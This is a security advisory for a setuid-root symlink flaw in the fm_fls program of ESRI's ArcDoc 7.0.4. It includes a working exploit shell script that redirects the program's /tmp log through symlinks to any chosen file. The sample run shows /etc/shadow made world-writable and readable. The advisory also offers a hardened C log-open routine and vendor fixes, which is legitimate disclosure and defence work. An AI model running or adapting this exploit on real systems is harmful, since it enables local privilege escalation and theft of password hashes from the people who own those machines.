COMMAND

    fm_fls as distributed with ESRI's "ArcDoc" package (7.0.4)

SYSTEMS AFFECTED

    Any system that includes a setuid version of fm_fls is vulnerable.

PROBLEM

    The program "fm_fls" as distributed with ESRI's "ArcDoc" package
    (7.0.4) contains a bug which allows us to (a) append somewhat
    arbitrary data (the bad arguments it echoes into its log) to any
    file and (b) change the permissions of that file to rw-rw-rw-.

    fm_fls is setuid root.

    When fm_fls is executed, it opens up a logfile -- the default
    location for this file is /tmp/fm_fls.log.  Unfortunately, it
    doesn't check whether this file already exists or whether it is a
    symlink pointing somewhere else.  If for some reason fm_fls gets
    bad arguments, it will write these bad arguments to the logfile,
    chown the file to root, give the file 666 permissions, and exit.

    If we make the logfile a symlink to an unreadable file, we can
    both append the contents of the logfile to the unreadable file
    and gain world rw access to that file.
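    The following is an added illustration, not code from ESRI or from
    the advisory: a log-open routine written the way a setuid program
    should open a file in a world-writable directory, plus a self-check
    that builds a log -> victim symlink in a private scratch directory
    (constructed, not the real /tmp/fm_fls.log) and confirms the hardened
    open refuses it while a plain open(2) of the kind fm_fls uses follows
    it.  Names (safe_open_log, symlink_is_refused) are my own.

```c
#define _GNU_SOURCE            /* mkdtemp(3) and O_NOFOLLOW on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* What a privileged log routine should do instead: never follow a symlink at
 * the final component, and refuse anything but a single-link regular file
 * owned by the expected (unprivileged) user. Returns fd >= 0, or -1 with
 * errno set; ELOOP means "that path was a symlink". No chown/chmod after. */
int safe_open_log(const char *path, uid_t expected_owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != expected_owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check in a private scratch directory (constructed): "log" is a symlink
 * to "victim". Returns 1 when a plain open(2) like fm_fls's follows the link
 * but safe_open_log() refuses it with ELOOP, else 0. */
int symlink_is_refused(void)
{
    char dir[] = "/tmp/fmflsdemo.XXXXXX", victim[64], log[64];
    int v, n, s, ok = 0;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(log, sizeof log, "%s/log", dir);
    v = open(victim, O_WRONLY | O_CREAT, 0600);
    if (v >= 0 && symlink(victim, log) == 0) {
        n = open(log, O_WRONLY | O_APPEND | O_CREAT, 0666); /* as fm_fls */
        s = safe_open_log(log, getuid());
        ok = n >= 0 && s < 0 && errno == ELOOP;
        if (n >= 0) close(n);
    }
    if (v >= 0) close(v);
    unlink(log); unlink(victim); rmdir(dir);
    return ok;
}
```

    Even with this check, a setuid program has no business logging into
    /tmp at all; a root-owned directory that unprivileged users cannot
    write to removes the race entirely.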


    ------------------------------------------------------------------
    #!/bin/sh
    #
    #
    #
    # fix: chmod 555 `which fm_fls`
    #
    # tested on Solaris 2.5 w/ ArcDoc 7.0.4
    #

    # full path to the fm_fls executable

    FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls"

    LOGFILE=/tmp/fm_fls.log
    TMP=/tmp/exploit.$$
    UNREADABLE=$1


    if [ $# != 1 ]
    then
     echo "usage: `basename $0` filename"
     exit 1
    fi

    rm -f $LOGFILE

    if [ -f $LOGFILE ]
    then
     echo "tried to remove $LOGFILE, but it still exists!  Exploit won't work."
     exit 1
    fi

    # since fm_fls will complain if we link to a logfile too "far away"
    # from the original file, we just do a dual link..

    ln -s $UNREADABLE $TMP
    ln -s $TMP $LOGFILE

    $FM_FLS woot

    echo "`basename $0` of $UNREADABLE yields:"

    ls -l $UNREADABLE

    # all done, clean up.

    rm -f $TMP $LOGFILE
    exit 0
    ------------------------------------------------------------------

    Example :

    nowhere:> id
    uid=200(jwa) gid=107(cpin)

    nowhere:> ls -l /etc/shadow
    -rw-------   1 root     other       1851 May 23 20:22 /etc/shadow

    nowhere:> fm.sploit /etc/shadow
    /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls:
    Error.  Unable to open License File woot fm.sploit of /etc/shadow yields:
    -rw-rw-rw-   1 root     other       2011 May 23 20:38 /etc/shadow

    nowhere:> tail -5 /etc/shadow
    mpm:xxxxxxxxxxxxx:6445::::::
    ebp:xxxxxxxxxxxxx:6445::::::
    sml:xxxxxxxxxxxxx:6445::::::
    1996/05/23-20:38:32 BG woot nowhere
    # 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls:
    Error. Unable to open License File woot

    nowhere:~jwa/Security/Projects/r00tin>

    Note the additional lines appended to the target file (in this
    case, /etc/shadow).

SOLUTION

    To fix this, either (a) yell at your vendor or (b) strip the setuid
    bit with chmod 555 `which fm_fls`.